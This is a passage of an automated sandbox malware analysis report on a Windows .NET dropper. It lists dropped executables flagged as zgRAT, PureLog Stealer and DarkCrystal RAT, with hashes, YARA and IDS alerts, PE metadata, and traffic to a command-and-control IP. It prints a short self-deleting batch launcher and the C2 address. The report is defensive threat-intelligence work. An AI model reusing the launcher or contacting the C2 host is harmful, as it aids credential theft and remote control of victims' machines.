                                        Size (bytes):710
                                        Entropy (8bit):5.879417030654858
                                        Encrypted:false
                                        SSDEEP:12:F9UdldXpBhuKyXdk+fiB+c8K4983soWdC/35CjAc78H/AxUIYUo:odTheviBA98Vv5CjP78QYUo
                                        MD5:F0A435AF45AFA4D51D149203FF81327B
                                        SHA1:955F1208936A2577FAC46211FE220FD0A115A324
                                        SHA-256:A771B995A451FBD20438361CED5DA304F464926E7FEE492126D0037FE0AEC5C5
                                        SHA-512:241DD45C645181A537B58107ECC9A44907F6A028057D9DCB9876361C1167F59FFF8D1FC43547722F5A60B9A028CCF488B7F3AE610DB44120F960CB4C0F66603C
                                        Malicious:false
                                        Preview:VBNQVYZypEONUYEF2lxfWzJB2Oq034tTaA1NYvNKg9riSt4qZuGdCZVf1LXHsj4vV4wUg0qHXn9XIltJT9aJxPQBoWWMXGc6E5MX7kKiD8FZa8XQcOxsIv7GnvpKeetRKCSMYVLtz2FyJ0lq8FuJStyT8GtM4AEjPyPXpL1GCE3QqI6xK9LYtk8bO9OSl9zyyfjVlNAxOnGO0imzJ6B4zpzpzxJq6ifDPEcLjlL68XKGdtlpWYJo749Ip4fxDT0pID9vGbQivE5bftLGMdUhZ0FVFTfpFX3pgf8auzj4Ik328in6sZkj9SPR7oqw6lcXLQ49uvVW3aZy7MWgqi6qwTqNPqcGJx8hHfrrnnL7DNpj3aUvRJGXowl1kquESPNGb2qbep3CX9ninGUyVrzArk3V4zH63HoyAjHBt3QlPDAoJCNdW5slZMZ18Vhpi6JQVyiE9SFcaNvnkOM1lnj8YCYyJQCYVlDS4uTUeJeDzQLMbvQuIpD4WK1Sat4tQqGyJcs052XcJgIH1LXY9SQqiI6t2B4uOuxJJWD8CazQRkv0CuaOWgu8aaQAf9838nNYs97fIYVjc9Y7WFrHlpYsAzstGCdDc5SoXXICw5F8KLfaCTnaR0SSOeX3ROZG5RHhrtj97oUpjahzURrwYCwlm9Z29Ovif9C3E7tStocmfmsy7ii9hms2ff4sTrAs2vKkXovWiY

                                        C:\Program Files (x86)\WindowsPowerShell\Configuration\Schema\kRoaRVhtzmWNJQRz.exe

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.............................!... ...@....@.. ....................................@..................................!..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B.................!......H.......................l...q?... .......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........P.......................8....~....(X... .... .... ....s....~....(\....... ....~....{....9....& ....8........~....(`...~....(d... ....<.... ........8[...8.... ....8P...r...ps....z*~....9.... ........8(......... ....~..

                                        C:\Recovery\Registry.exe

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\Registry.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\Registry.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.............................!... ...@....@.. ....................................@..................................!..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B.................!......H.......................l...q?... .......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........P.......................8....~....(X... .... .... ....s....~....(\....... ....~....{....9....& ....8........~....(`...~....(d... ....<.... ........8[...8.... ....8P...r...ps....z*~....9.... ........8(......... ....~..

                                        C:\Recovery\ee2ad38f3d4382

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):14
                                        Entropy (8bit):3.6644977792004623
                                        Encrypted:false
                                        SSDEEP:3:wnUW0Jkn:wnUW0Jk
                                        MD5:1B4376F148D57EFD3C47808442BDE878
                                        SHA1:18DC5F837F9FD44D60F83B9522B5801CAA9EC93F
                                        SHA-256:66238FD67AAC018B9A25F1E54FE27382489B73869315A345D1BFDF903AE98613
                                        SHA-512:5526B0CBB85047010379F83E3E102A521745139BDA3662CDB26CA0F10DC56A2C767FE0CADDEECC4BE3EDD18E35CAE7659E87D345C94FFC1B5CB9DCD7303D818C
                                        Malicious:false
                                        Preview:Ql5bqwB3QKXiDA

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontReviewsavesinto.exe.log

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:CSV text
                                        Category:dropped
                                        Size (bytes):1089
                                        Entropy (8bit):5.357509376572314
                                        Encrypted:false
                                        SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4x
                                        MD5:84D615B35EDCC29D404E189F0403DF92
                                        SHA1:9FA889FD1624FD4D42C8A1E53A6C878D563B2B05
                                        SHA-256:ED840908AC2487C0156C61BBFCF4332B1824C033F03400FE906BBB44482205F5
                                        SHA-512:ED5F44D349501CBC583275E7298F7546BCAC71674055767E57CA620A0E3EC48FA23B62A3BB4153B14AB7778740298BAF89E68BBA3663542D9086C0FEDA1599CD
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                        C:\Users\user\AppData\Local\Temp\CotttcHbSw

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):25
                                        Entropy (8bit):4.243856189774723
                                        Encrypted:false
                                        SSDEEP:3:aVhXTMfdmn:aY4n
                                        MD5:1C595DF5A295BC17A66D57E7DC319559
                                        SHA1:A2CE7DD396538272DB5F81AE1E3AB8632DC0622B
                                        SHA-256:472B94F7BCF923F617192E8E9FEADE0DF7E5FDF8E27E667018E4B5637DEA1816
                                        SHA-512:F14E86730309E33480DC8B7FAC7EDB3D0448CF41DB931B96453758C1F1B522ACDD354AE0082801E09151AE6A1880AC91B4862372F71830FA18686212193367D2
                                        Malicious:false
                                        Preview:MbIi8SVa4brviCGuQUMQNShYB

                                        C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):225
                                        Entropy (8bit):5.085254888311013
                                        Encrypted:false
                                        SSDEEP:6:hCijTg3Nou1SV+DEQTdEwbLsYKOZG1cNwi23fOB:HTg9uYDEW2wE5Za
                                        MD5:511041A029093ABC1CAB7EC49C3AF0D5
                                        SHA1:D19752ECC439D5D6514348821E75196227F243BD
                                        SHA-256:31E8DE964638F0090CF35E8E752DAFA9E7D4C17F772CF05D51E29D5EA67CD46C
                                        SHA-512:C0D211C9B597C00E80DDD16C227B0B6F0A2F5EBB2E565265610472796479FAAE5F225CF94252EE98978715585AB8FC570E209CE76E5AB560F5F906E370C421AB
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\ComponentSavesinto\fontReviewsavesinto.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\F0ZVhIKmod.bat"

                                        C:\Windows\Vss\Writers\Application\8e184785bc19a8

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:ASCII text, with very long lines (676), with no line terminators
                                        Category:dropped
                                        Size (bytes):676
                                        Entropy (8bit):5.897054913297949
                                        Encrypted:false
                                        SSDEEP:12:maXrA+siuhcWoSXfBy4XVqFt8pxXc/dAKnS5iWIsWkQXMTENp7cTeBm1I6nJVn1j:v3moSXfFGtWmtS4WI35MsmdDn1j
                                        MD5:877E53FED4DB49CCC56C3A78580F5FB9
                                        SHA1:68B5AB48183AAD125B8C00A065AE66E455680135
                                        SHA-256:493B15714227A2142150651E458D37CCBAD24960478CD7C231646E3D8E28012F
                                        SHA-512:E782CF7CFACF08C64CAD02947DCD27F162E79E39948DDBD799637F258D9C57F42189172DCF0A28D8F831E232411AED9B71B3540F9F7CAB6C889834E2BE1FC506
                                        Malicious:false
                                        Preview:qIADcugclZPmauGODiR5ey66XEqYS3KMIwMthTKMfNJcP6tSwX3B6DL2MDqXEIKrPCdnhXrtXEaRodraVXl4AIQFlUhdnxIXDbNNcGvZqKo1n3NsWQCqgPrGvYBM0NGk6DONQd7OmMNzeYbsHyHXuc0xtGbEFijdDD5kpAc2SxDUC1lW6SFBGtzeMbdJC3JEmuwad1DHWOE7Ygv1eEHwchWTObXOgS0Zn9rRFK3FP8p1o1Fppmp7vXlEXcMBdykDYpTYyewTLCgd2foWVsi4n2nQXn3m81laXlc9iq1LzVvt1IL2xzpvQqafCDBLkJVUbFGRCpyo0WESH4ZPbAzILzKqK77eppkqAbSvB4zHBB43mIYHovujUMIl5ZGFsT9LvXRpmnNgLrHK5QECiz035BWxTr0myuZrBtHO0sfBiNYmE7poUDg3dFPuBeW5xksaRZILI0MzTzVrmtsVBLRuNgO6dXMWWkO7f7Vpzege1qjotiHSvA3lS8NvLMrvnzdslXMpXDghpx2g6kM5P4lVqmogujdmwu1CN0DVVc4reW5fGqyl9wftOHB8tq5yk3v46zTFh0jx941UqJaDu2n9PHxFzEmphGHklBjQXtEIMrtUQrRkP1DrQvpyBOQcN3Q3wQspjJqByewhYdyHxCZpCZU0VvOIcl4Tb0hA

                                        C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exe

                                        Download File
                                        Process:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1640960
                                        Entropy (8bit):7.418633106342168
                                        Encrypted:false
                                        SSDEEP:24576:rSgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6r:rCFK3INhNIbDcykP+yiS
                                        MD5:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        SHA1:C8FE062863454F2170CB5ADD5E38733311C48066
                                        SHA-256:4FA8244E62B244B9F543363577DBAB6F4765809C4E4B09DE4D42BD0B05384FF9
                                        SHA-512:A29E0820F2188AF78133BA0AC8C1FA86A0F76038B222E15CBEB5167D1EB5F2A5E959D2CE5081FE694C458A204D1A222F92AEA35D1049096807CCF25C68113D67
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 88%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....&g.............................!... ...@....@.. ....................................@..................................!..K....@.. ....................`....................................................... ............... ..H............text........ ...................... ..`.rsrc... ....@......................@....reloc.......`......................@..B.................!......H.......................l...q?... .......................................0..........(.... ........8........E........9...8.......8....(.... ....8....(.... ....~....{....9....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........P.......................8....~....(X... .... .... ....s....~....(\....... ....~....{....9....& ....8........~....(`...~....(d... ....<.... ........8[...8.... ....8P...r...ps....z*~....9.... ........8(......... ....~..

                                        \Device\Null

                                        Download File
                                        Process:C:\Windows\System32\w32tm.exe
                                        File Type:ASCII text
                                        Category:dropped
                                        Size (bytes):151
                                        Entropy (8bit):4.857089018191496
                                        Encrypted:false
                                        SSDEEP:3:VLV993J+miJWEoJ8FXInmz/XKNrN/EKrv:Vx993DEUTD
                                        MD5:A23A1AE72308520F542FF0F07AD82AAB
                                        SHA1:B79A281EA271F5D79464C8F4CA893F5C308CA222
                                        SHA-256:B7CFD2549A791A04ECF4A830F6745A4E89CBA80BD5BA09FBB156C42D9781D67B
                                        SHA-512:398E24759D970FF457A5E6354038CC6B7FCFF8F99DD63AF48A4F651101815745E754296B1696B57E740BF9E5D8CC006F4232ABCC62FC60F1C50E2B003B95B26C
                                        Malicious:false
                                        Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 05/11/2024 03:54:16..03:54:16, error: 0x800705B4.03:54:22, error: 0x800705B4.

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Entropy (8bit):7.363101749271499
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:HcEvQKWAu2.exe
                                        File size:1'962'809 bytes
                                        MD5:3a92479aa98e55499bfa33bc2ea35b64
                                        SHA1:2645ee34fe180b3c775fec79729f5ecee1dab95f
                                        SHA256:cc8ffd463272f8abfb56f7f6c7a83ade8137e8df4c8cf39926469bf54efd1f71
                                        SHA512:137fe77d848b628a212e52fb9c8bac86c42914b51a2914f60676c3799e3c346a03c9122a54ed899888dbc58a59990f9cbd381212e08cfb82d071a577892d8d48
                                        SSDEEP:24576:2TbBv5rUyXV/SgxSKCk+FpaARF5+dKz8It1s4o4NIbDc405+iPP+x2PMZ5S6re:IBJ/CFK3INhNIbDcykP+yiSf
                                        TLSH:1D95AF1369D2AE33D2A457718657423D9290D7223A25EF0F361F1497AE07BF18B722B3
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

                                        File Icon

                                        Icon Hash:1515d4d4442f2d2d

                                        Static PE Info

                                        General

                                        Entrypoint:0x41f530
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:12e12319f1029ec4f8fcbed7e82df162

                                        Entrypoint Preview

                                        Instruction
                                        call 00007FFA8506552Bh
                                        jmp 00007FFA85064E3Dh
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        push dword ptr [ebp+08h]
                                        mov esi, ecx
                                        call 00007FFA85057C87h
                                        mov dword ptr [esi], 004356D0h
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        and dword ptr [ecx+04h], 00000000h
                                        mov eax, ecx
                                        and dword ptr [ecx+08h], 00000000h
                                        mov dword ptr [ecx+04h], 004356D8h
                                        mov dword ptr [ecx], 004356D0h
                                        ret
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push ebp
                                        mov ebp, esp
                                        push esi
                                        mov esi, ecx
                                        lea eax, dword ptr [esi+04h]
                                        mov dword ptr [esi], 004356B8h
                                        push eax
                                        call 00007FFA850682CFh
                                        test byte ptr [ebp+08h], 00000001h
                                        pop ecx
                                        je 00007FFA85064FCCh
                                        push 0000000Ch
                                        push esi
                                        call 00007FFA85064589h
                                        pop ecx
                                        pop ecx
                                        mov eax, esi
                                        pop esi
                                        pop ebp
                                        retn 0004h
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 0Ch
                                        lea ecx, dword ptr [ebp-0Ch]
                                        call 00007FFA85057C02h
                                        push 0043BEF0h
                                        lea eax, dword ptr [ebp-0Ch]
                                        push eax
                                        call 00007FFA85067D89h
                                        int3
                                        push ebp
                                        mov ebp, esp
                                        sub esp, 0Ch
                                        lea ecx, dword ptr [ebp-0Ch]
                                        call 00007FFA85064F48h
                                        push 0043C0F4h
                                        lea eax, dword ptr [ebp-0Ch]
                                        push eax
                                        call 00007FFA85067D6Ch
                                        int3
                                        jmp 00007FFA85069807h
                                        int3
                                        int3
                                        int3
                                        int3
                                        push 00422900h
                                        push dword ptr fs:[00000000h]

                                        Rich Headers

                                        Programming Language:
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x3d0700x34.rdata
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3d0a40x50.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000xdff8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000x233c.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3b11c0x54.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355f80x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x330000x278.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c5ec0x120.rdata
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x31bdc0x31c002831bb8b11e3209658a53131886cdf98False0.5909380888819096data6.712962136932442IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x330000xaec00xb000042f11346230ca5aa360727d9908e809False0.4579190340909091data5.261605615899847IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0x3e0000x247200x10009670b581969e508258d8bc903025de5eFalse0.451416015625data4.387459135575936IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .didat0x630000x1900x200c83554035c63bb446c6208d0c8fa0256False0.4453125data3.3327310103022305IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x640000xdff80xe000ba08fbcd0ed7d9e6a268d75148d9914bFalse0.6373639787946429data6.638661032196024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x720000x233c0x240040b5e17755fd6fdd34de06e5cdb7f711False0.7749565972222222data6.623012966548067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        PNG0x646500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                        PNG0x651980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                        RT_ICON0x667480x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                        RT_ICON0x66cb00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                        RT_ICON0x675580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                        RT_ICON0x684000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                        RT_ICON0x688680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                        RT_ICON0x699100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                        RT_ICON0x6beb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                        RT_DIALOG0x705880x286dataEnglishUnited States0.5092879256965944
                                        RT_DIALOG0x703580x13adataEnglishUnited States0.60828025477707
                                        RT_DIALOG0x704980xecdataEnglishUnited States0.6991525423728814
                                        RT_DIALOG0x702280x12edataEnglishUnited States0.5927152317880795
                                        RT_DIALOG0x6fef00x338dataEnglishUnited States0.45145631067961167
                                        RT_DIALOG0x6fc980x252dataEnglishUnited States0.5757575757575758
                                        RT_STRING0x70f680x1e2dataEnglishUnited States0.3900414937759336
                                        RT_STRING0x711500x1ccdataEnglishUnited States0.4282608695652174
                                        RT_STRING0x713200x1b8dataEnglishUnited States0.45681818181818185
                                        RT_STRING0x714d80x146dataEnglishUnited States0.5153374233128835
                                        RT_STRING0x716200x46cdataEnglishUnited States0.3454063604240283
                                        RT_STRING0x71a900x166dataEnglishUnited States0.49162011173184356
                                        RT_STRING0x71bf80x152dataEnglishUnited States0.5059171597633136
                                        RT_STRING0x71d500x10adataEnglishUnited States0.49624060150375937
                                        RT_STRING0x71e600xbcdataEnglishUnited States0.6329787234042553
                                        RT_STRING0x71f200xd6dataEnglishUnited States0.5747663551401869
                                        RT_GROUP_ICON0x6fc300x68dataEnglishUnited States0.7019230769230769
                                        RT_MANIFEST0x708100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333

                                        Imports

                                        DLLImport
                                        KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                                        OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                        gdiplus.dllGdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-11-05T08:12:16.386372+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.749720TCP
                                        2024-11-05T08:12:18.601542+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.74974537.44.238.25080TCP
                                        2024-11-05T08:12:55.057943+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.749975TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 5, 2024 08:12:17.731432915 CET4974580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:17.736769915 CET804974537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:17.736840010 CET4974580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:17.737215042 CET4974580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:17.742913961 CET804974537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:18.086977959 CET4974580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:12:18.091918945 CET804974537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:12:18.547844887 CET804974537.44.238.250192.168.2.7
